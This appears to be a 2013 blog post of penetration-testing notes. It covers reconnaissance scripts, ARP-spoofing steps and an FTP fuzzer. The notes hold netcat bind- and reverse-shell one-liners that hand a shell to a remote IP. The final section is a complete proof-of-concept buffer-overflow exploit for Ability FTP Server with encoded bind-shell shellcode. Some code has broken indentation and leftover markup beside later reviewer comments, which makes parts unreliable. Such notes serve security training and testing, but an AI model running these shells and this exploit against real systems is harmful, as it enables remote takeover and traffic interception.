Tuesday, January 15, 2013

pentesting notes


*****************************************************************
 Text Manipulation-
 BASH(save as .sh and chmod 755):

 

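#!/bin/bash
# Print the unique icq.com host names referenced by href= attributes in a
# saved HTML page (defaults to icq.html in the current directory).
# The original shebang had a trailing slash (bad interpreter) and the
# host pattern was wrapped in forum [url] markup; both are repaired here.
extract_hosts() {
  local page=$1
  # cut -d"/" -f3 keeps the host part of an http://host/... URL.
  grep -- "href=" "$page" | cut -d"/" -f3 | grep -F -- "icq.com" | sort -u
}
extract_hosts "${1:-icq.html}"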
find IPs-
 

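 #!/bin/bash
# Resolve each host name listed in icqservers.txt (one name per line) and
# print its IPv4 address(es). Names that do not resolve print nothing.
# Fixes: trailing slash in the shebang, and `for name in $(cat ...)`,
# which word-splits and globs the file contents, replaced by a line loop.
resolve_hosts() {
  local list=$1 name
  while IFS= read -r name || [[ -n "$name" ]]; do
    [[ -n "$name" ]] || continue   # skip blank lines
    host "$name" | grep "has address" | cut -d" " -f4
  done < "$list"
}
resolve_hosts "${1:-icqservers.txt}"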
 ping IPs-

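 #!/bin/bash
# Send one ICMP echo to 192.168.1.200 .. 192.168.1.250 and print the replies.
# Hosts that drop ICMP simply do not appear; -c1 sends a single probe.
# Fixes: trailing slash in the shebang; `seq` replaced by a C-style loop.
ping_sweep() {
  local prefix=$1 first=$2 last=$3 n
  for (( n = first; n <= last; n++ )); do
    ping -c1 "$prefix.$n" | grep "bytes from"
  done
}
ping_sweep 192.168.1 200 250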
 DNS Forward-

 #!/bin/bash/
 host $[url="http://name.checkpoint.com/"]name.checkpoint.com[/url] | grep "has address"
 done
 DNS Reverse-
 

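#!/bin/bash
# Reverse-resolve 204.236.255.64 .. 204.236.255.79 and print the PTR records.
# Fixes: trailing slash in the shebang; `seq` replaced by a C-style loop.
dns_reverse() {
  local prefix=$1 first=$2 last=$3 n
  for (( n = first; n <= last; n++ )); do
    host "$prefix.$n" | grep "domain name pointer "
  done
}
dns_reverse 204.236.255 64 79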
 Zone XFR-

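 #!/bin/bash
# Zone transfer check: for every authoritative name server of a domain, ask
# for a full zone transfer (AXFR) and print the A records it hands back.
# A server that answers is misconfigured: AXFR should be limited to the
# zone's own secondaries.
# Fixes: trailing slash in the shebang, `read` without -r, and the literal
# word `domain` that was passed to `host -l` instead of "$domain".
zone_xfr() {
  local domain=$1 fqdn
  # `host -t ns` prints "<domain> name server <fqdn>."; field 4 is the server.
  while IFS= read -r fqdn; do
    [[ -n "$fqdn" ]] || continue
    host -l "$domain" "$fqdn" | grep "has address"
  done < <(host -t ns "$domain" | cut -d" " -f4)
}

if (( $# >= 1 )); then
  domain=$1
else
  printf '%s\n' "[*] Please enter a domain name:"
  IFS= read -r domain
fi
if [[ -n "$domain" ]]; then
  zone_xfr "$domain"
else
  printf 'no domain given\n' >&2
fi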
 

SNMP Bruteforce(for use with onesixtyone)-
 (script to glean local addresses for port 161)

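#!/bin/bash
# Write ip.usally.local.1 .. ip.usally.local.254 to log.txt, one per line,
# as the host list for onesixtyone (SNMP community check on UDP 161).
# `seq` replaced by a brace expansion; output goes through printf so the
# list can also be produced on stdout by calling gen_hosts directly.
gen_hosts() {
  local prefix=$1 n
  for n in {1..254}; do
    printf '%s.%s\n' "$prefix" "$n"
  done
}
gen_hosts ip.usally.local > log.txt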

***************************************************************

BindShell:

nc -lvp 4444 listens on port 4444; adding -e cmd.exe (or /bin/bash) makes cmd or bash available to whoever connects, i.e. it binds cmd or bash to nc.
i.e: nc -lvp 4444 -e cmd.exe

ReverseShell:

nc -v x.x.x.x 4444 connects to IP x.x.x.x on port 4444; adding -e cmd.exe (or /bin/bash) forwards the shell to that IP on port 4444.
i.e: nc -v x.x.x.x 4444 -e /bin/bash

Banner Grab:

nc -v www.x.com 80 <enter>
HEAD / HTTP/1.0<enter>

or

echo -ne 'HEAD / HTTP/1.0\r\n\r\n' | nc -vv <address> <port>
 

Netcat Portscan

nc -z -nvv -w 1 <IP> <port range>
-p port local port number
-l listen mode, for inbound connects
-e <program> to exec after connect
-o file hex dump of traffic
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-n numeric-only IP addresses, no DNS
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]

NSE: nmap <IP> --script X.nse

/usr/share/nmap/scripts/asn-query.nse
/usr/local/share/nmap/scripts/auth-owners.nse
/usr/local/share/nmap/scripts/auth-spoof.nse
/usr/local/share/nmap/scripts/banner.nse
/usr/local/share/nmap/scripts/smb-brute.nse
/usr/local/share/nmap/scripts/smb-check-vulns.nse
/usr/local/share/nmap/scripts/smb-enum-domains.nse
/usr/local/share/nmap/scripts/smb-enum-groups.nse
/usr/local/share/nmap/scripts/smb-enum-processes.nse
/usr/local/share/nmap/scripts/smb-enum-sessions.nse
/usr/local/share/nmap/scripts/smb-enum-shares.nse
/usr/local/share/nmap/scripts/smb-enum-users.nse
/usr/local/share/nmap/scripts/smb-os-discovery.nse
/usr/local/share/nmap/scripts/smb-psexec.nse
/usr/local/share/nmap/scripts/smb-security-mode.nse
/usr/local/share/nmap/scripts/smb-server-stats.nse
/usr/local/share/nmap/scripts/smb-system-info.nse
/usr/local/share/nmap/scripts/smbv2-enabled.nse
/usr/local/share/nmap/scripts/smtp-commands.nse
/usr/local/share/nmap/scripts/smtp-open-relay.nse
/usr/local/share/nmap/scripts/smtp-strangeport.nse
/usr/local/share/nmap/scripts/sniffer-detect.nse
/usr/local/share/nmap/scripts/snmp-brute.nse
/usr/local/share/nmap/scripts/snmp-sysdescr.nse
/usr/local/share/nmap/scripts/socks-open-proxy.nse
/usr/local/share/nmap/scripts/sql-injection.nse
/usr/local/share/nmap/scripts/ssh-hostkey.nse
/usr/local/share/nmap/scripts/sshv1.nse
/usr/local/share/nmap/scripts/ssl-cert.nse
/usr/local/share/nmap/scripts/sslv2.nse
/usr/local/share/nmap/scripts/telnet-brute.nse
/usr/local/share/nmap/scripts/upnp-info.nse
/usr/local/share/nmap/scripts/whois.nse
/usr/local/share/nmap/scripts/x11-access.nse

Python:

SMTP USER CHECK-


#!/usr/bin/python
# SMTP VRFY user check (Python 2: print statement, str-based sockets).
# Connects to one fixed server, prints its banner, sends "VRFY <user>"
# and prints whatever the server answers. The '<ip>' and '<port>' tokens
# below are placeholders and must be replaced before this runs (the port
# must be an int). No socket timeout is set, so a server that accepts the
# connection but never answers blocks recv() indefinitely.
# Defender's note: a server that answers VRFY differently for existing and
# non-existing mailboxes lets a client confirm account names one by one;
# mail servers are commonly configured to disable VRFY/EXPN for that reason.
import socket
import sys
if len(sys.argv) !=2:
# NOTE(review): the two lines below belong inside the `if` body; their
# indentation appears to have been lost in this paste.
print "usage: vrfy.py <user name>"
sys.exit(0)
#create socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#connect to server (connect() returns None; the assignment is unused)
connect=s.connect(('<ip>',<port>))
#rcv & prnt banner (single 1024-byte read; a longer banner is truncated)
banner=s.recv(1024)
print banner
#send,VRFY request & print (argv[1] is inserted unescaped into the command)
s.send('VRFY ' + sys.argv[1] + '\r\n')
result=s.recv(1024)
print result
#close socket (not reached if any call above raises)
s.close()

Null Session Attacks:
rpcclient -U "" <ip>
>help, srvinfo, enumdomusers, enumdomgroups, getdompwinfo

ARPSpoof Notes:

IPv6 does not use ARP, so it is not susceptible to ARP poisoning/spoofing (its Neighbor Discovery protocol has analogous spoofing problems, though).
ARP spoofing is, by default, a local attack (the attacker must be on the same broadcast domain). There are ways to circumvent this, but they are not covered here.
You will want the following information:
Gateway : ipv4:MAC
Attacker: ipv4:MAC
Victim : ipv4:MAC
You will need the following *NIX command and BASH Script.
file2cable script:
*(1)ip forward:
echo 1 > /proc/sys/net/ipv4/ip_forward

*(2)file2cable bash script. save script as <whatever>.sh, chmod 755 <script.sh name>, execute as ./<script name>.sh

--cut--

#!/bin/bash
# Re-injects the two pre-built ARP frames (arp-victim and arp-gateway, see
# steps *(3a)/(3b) in the notes) on eth0, then sleeps two seconds, as
# step *(2) of the notes describes. Both frames are sent from this one
# loop, so one script keeps both caches poisoned.
# Defender's note: a host emitting unsolicited ARP replies for the
# gateway's IP at a fixed interval is exactly what arpwatch-style
# monitoring and switch Dynamic ARP Inspection are built to flag.
while [1];do
file2cable -i eth0 -f arp-victim
file2cable -i eth0 -f arp-gateway
sleep 2
done

--cut---

*(3a)VICTIM Hex Map --save as arp-victim
dest(mac) == victim
source(mac)== attacker
sender(mac)== attacker
sender(ip) == default.gateway
target(ip) == victim
both maps below are 6 bytes. best found using Wireshark.
DEST MAC | SOURCE MAC | unchanged
unchanged | SENDER MAC | SENDER.IP
TARGET MAC | TARGET.IP | unchanged
#save both maps separately; both get loaded simultaneously by the file2cable script *(2).

*(3b)GATEWAY Hex Map --save as arp-gateway
dest(mac) == gateway
target(mac) == gateway
source(mac) == attacker
sender(mac) == attacker
target(ip) == gateway
DEST MAC | SOURCE MAC | unchanged
unchanged | unchanged | VICTIM.IP
TARGET MAC | TARGET.IP | unchanged

/// VICTIM PACKET ///
See *(3a) VICTIM Hex Map
---The VICTIM packet will try to fool the VICTIM machine into believing that the ATTACKER's MAC address has the IP of the Default GATEWAY (192.168.2.1). Hexedit ATTACKER HEX to GATEWAY HEX,arp -a to confirm ATTACKER HEX is same as GATEWAY HEX.
Because the most recently updated ARP cache entry takes precedence, all traffic addressed to the GATEWAY now reaches the ATTACKER, who then forwards it to the GATEWAY.

---Now you need to create a packet for GATEWAY. You need to fool GATEWAY by making it forward all packets intended for VICTIM,to ATTACKER.
Before sending the packets to the network,enable IP forwarding*(1) on ATTACKER, so that packets arriving from VICTIM to ATTACKER will be passed on to GATEWAY.

---Now you can send ARP replies to both the GATEWAY and VICTIM, using the 'file2cable Bash script'.
This Bash script will send packets to the VICTIM & GATEWAY,every two seconds (so the VICTIM ARP cache does not get an opportunity to repair itself).
Now,traffic sent to the internet from VICTIM,is first sent to ATTACKER then forwarded to GATEWAY.

/// GATEWAY PACKET ///
See *(3b)GATEWAY Hex Map


Appendix of known Ability Server 2.2.5, 2.3.2, 2.3.4, Windows 2000 Server SP4, Windows XP SP2 vulnerabilities and Exploit Code & Answers:

* At what bytes is EIP overwritten?
00C3B6B8-00C3B698(966-986th byte)

* Where will you place your shellcode?
In ESP

* How much space do you have for your shellcode?
00C3BA98 - 00C3B6B8=992 bytes

* How can you get to your shellcode?
Overwrite EIP with ESP address.

* Can you find an RET address? What is it?
Yes. example: a JMP ESP address,that can be used as a RET address,may be found
in USER32.dll and/or KERNEL32.dll. RET is used to control execution flow, such as to jump from EIP to ESP as a means to run shellcode (that is in ESP). EIP contains the address of the memory which the processor is going to execute, so we overwrite EIP with an ESP address (because ESP holds our shellcode). Before you can use a RET, you must be able to determine how many bytes are required to begin to overwrite it.

* Are there any restricted bytes in the buffer?
Yes: the null byte '\x00'. A null byte terminates the buffer, so the shellcode is encoded to avoid it.

* Can the exploit be improved by using different exit techniques in the Metasploit shellcode?

Yes. for example?

Exit Techniques:


thread: This method is used in most exploitation scenarios where the exploited process runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit).

process: This method should be used with multi/handler. This method should also be used with any exploit where a master process restarts it on exit.


seh: This method should be used when there is a structured exception handler (SEH) that will restart the thread or process automatically when an error occurs.

FTP Ability Server 2.34 Fuzzer:
#!/usr/bin/python
#port address is hardcoded
# Python 2 FTP argument-length fuzzer. For each command in `commands` it
# opens a fresh connection, logs in with fixed credentials and sends the
# command with an argument of growing length: buffer holds "A", then
# "A"*20, "A"*120, ... "A"*2920 (31 strings in total, step 100).
# There is no exception handling: a refused connection or a server that
# stops answering raises and ends the run. The log line prints only the
# argument length, not the bytes sent.
# Defender's note: repeated logins as ftp/ftp each followed by a single
# multi-kilobyte command argument is an easy pattern to alert on in FTP
# server logs or an IDS.
import socket, sys
host = sys.argv[1]

#buffer array
buffer=["A"]

counter=20
while len(buffer) <= 30:
buffer.append("A"*counter)
counter=counter+100

#fuzzed commands. APPE included to test for APPE vulnerability which is known to act the same as Ability FTP's STOR Vulnerability,both of which end in a spawned shell. Spawned shell will be the same user level as the server was running as.
#Windows XP SP2 and Windows 2000 SP4 (Ability server 2.25-34) are noted to be vulnerable. buffer length and RET are the same between STOR and APPE vulnerability.
commands=["MKD", "CWD", "GET", "STOR", "APPE"]

#fuzz l00p
# NOTE(review): the inner `for string in buffer:` loop and its body must be
# indented under this outer loop; the indentation appears lost in this paste.
for command in commands:

for string in buffer:
  print ""+command+" command issued w/: "+ str(len(string))+" - bytes"
  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

  #send & receive. Default Login is ftp and Password is ftp. These are hardcoded in. Edit as needed.
  #(connect() returns None; the assignment is unused; no timeout is set)
  connect=s.connect((host,21))
  s.recv(1024)
  #send login
  s.send('USER ftp\r\n')
  s.recv(1024)
  #send password
  s.send('PASS ftp\r\n')
  s.recv(1024)
  #send buffer
  s.send(command+' '+string+'\r\n')
  s.recv(1024)
  #quit (the server's reply to QUIT is not read before the socket closes)
  s.send('QUIT ftp \r\n')
  s.close()


#Ability Server 2.34 - Remote Vulnerability Proof of Concept Code.
#use: ./ASPOC.py <target IP>

#!/usr/bin/python
# Python 2 proof-of-concept as given in the notes above: opens one FTP
# connection, logs in, and sends a single APPE command whose argument is
# the 2000-byte buffer assembled below, then closes the socket. There is
# no error handling and no timeout; every reply is read once and discarded.
# Defender's note: the observable footprint is an FTP login followed by an
# APPE (or STOR) command with a ~2 KB argument on port 21 and, per the
# comment on the payload, a new listener on port 31337 on the server
# afterwards. The fix on the server side is to patch or retire the
# affected Ability Server versions rather than expose them.
import socket, sys
host = sys.argv[1]

#tcp connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#344 Bytes | BIND Shell on PORT: 31337 | EXIT Technique: Thread | bound to CMD.exe
#encoded to mask Null Bytes
#(opaque byte string copied from the notes; not analysed further here)
shellcode=("\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5a"
"\xcd\xd3\x62\x83\xeb\xfc\xe2\xf4\xa6\xa7\x38\x2f\xb2\x34\x2c\x9d"
"\xa5\xad\x58\x0e\x7e\xe9\x58\x27\x66\x46\xaf\x67\x22\xcc\x3c\xe9"
"\x15\xd5\x58\x3d\x7a\xcc\x38\x2b\xd1\xf9\x58\x63\xb4\xfc\x13\xfb"
"\xf6\x49\x13\x16\x5d\x0c\x19\x6f\x5b\x0f\x38\x96\x61\x99\xf7\x4a"
"\x2f\x28\x58\x3d\x7e\xcc\x38\x04\xd1\xc1\x98\xe9\x05\xd1\xd2\x89"
"\x59\xe1\x58\xeb\x36\xe9\xcf\x03\x99\xfc\x08\x06\xd1\x8e\xe3\xe9"
"\x1a\xc1\x58\x12\x46\x60\x58\x22\x52\x93\xbb\xec\x14\xc3\x3f\x32"
"\xa5\x1b\xb5\x31\x3c\xa5\xe0\x50\x32\xba\xa0\x50\x05\x99\x2c\xb2"
"\x32\x06\x3e\x9e\x61\x9d\x2c\xb4\x05\x44\x36\x04\xdb\x20\xdb\x60"
"\x0f\xa7\xd1\x9d\x8a\xa5\x0a\x6b\xaf\x60\x84\x9d\x8c\x9e\x80\x31"
"\x09\x9e\x90\x31\x19\x9e\x2c\xb2\x3c\xa5\xa9\x0b\x3c\x9e\x5a\x83"
"\xcf\xa5\x77\x78\x2a\x0a\x84\x9d\x8c\xa7\xc3\x33\x0f\x32\x03\x0a"
"\xfe\x60\xfd\x8b\x0d\x32\x05\x31\x0f\x32\x03\x0a\xbf\x84\x55\x2b"
"\x0d\x32\x05\x32\x0e\x99\x86\x9d\x8a\x5e\xbb\x85\x23\x0b\xaa\x35"
"\xa5\x1b\x86\x9d\x8a\xab\xb9\x06\x3c\xa5\xb0\x0f\xd3\x28\xb9\x32"
"\x03\xe4\x1f\xeb\xbd\xa7\x97\xeb\xb8\xfc\x13\x91\xf0\x33\x91\x4f"
"\xa4\x8f\xff\xf1\xd7\xb7\xeb\xc9\xf1\x66\xbb\x10\xa4\x7e\xc5\x9d"
"\x2f\x89\x2c\xb4\x01\x9a\x81\x33\x0b\x9c\xb9\x63\x0b\x9c\x86\x33"
"\xa5\x1d\xbb\xcf\x83\xc8\x1d\x31\xa5\x1b\xb9\x9d\xa5\xfa\x2c\xb2"
"\xd1\x9a\x2f\xe1\x9e\xa9\x2c\xb4\x08\x32\x03\x0a\xb5\x03\x33\x02"
"\x09\x32\x05\x9d\x8a\xcd\xd3\x62");


#pad buffer /w 966 bytes of A's + 4 JMP ESP bytes from USER32.dll
#+ pad /w 16 bytes of C's + 16 bytes of NOP SLED + 654 bytes of Break
#Points + 344 Bytes of Shellcode =2000 bytes.
#(the code places the shellcode before the 0xcc padding, the comment above
# lists them the other way round; the total is 2000 bytes either way)
buffer="\x41"*966 + "\x6F\xC1\x75\x77" +"\x43"*16 + "\x90" * 16 +shellcode + "\xcc"*654

#ftp IP & port
print "-connecting to ftp.."
connect = s.connect((host,21))
data = s.recv(1024)
#NOTE(review): the log line says "USER ftp" but the name actually sent is
#ratdance; the replies read into `data` are never inspected.
print "-sending USER ftp.."
s.send('USER ratdance' + '\r\n')
data = s.recv(1024)
print "-sending PASS ftp.."
s.send('PASS ftp' + '\r\n')
data = s.recv(1024)
print "-sending command APPE and buffer /w shellcode.."
s.send('APPE' +buffer+ '\r\n')
s.close()
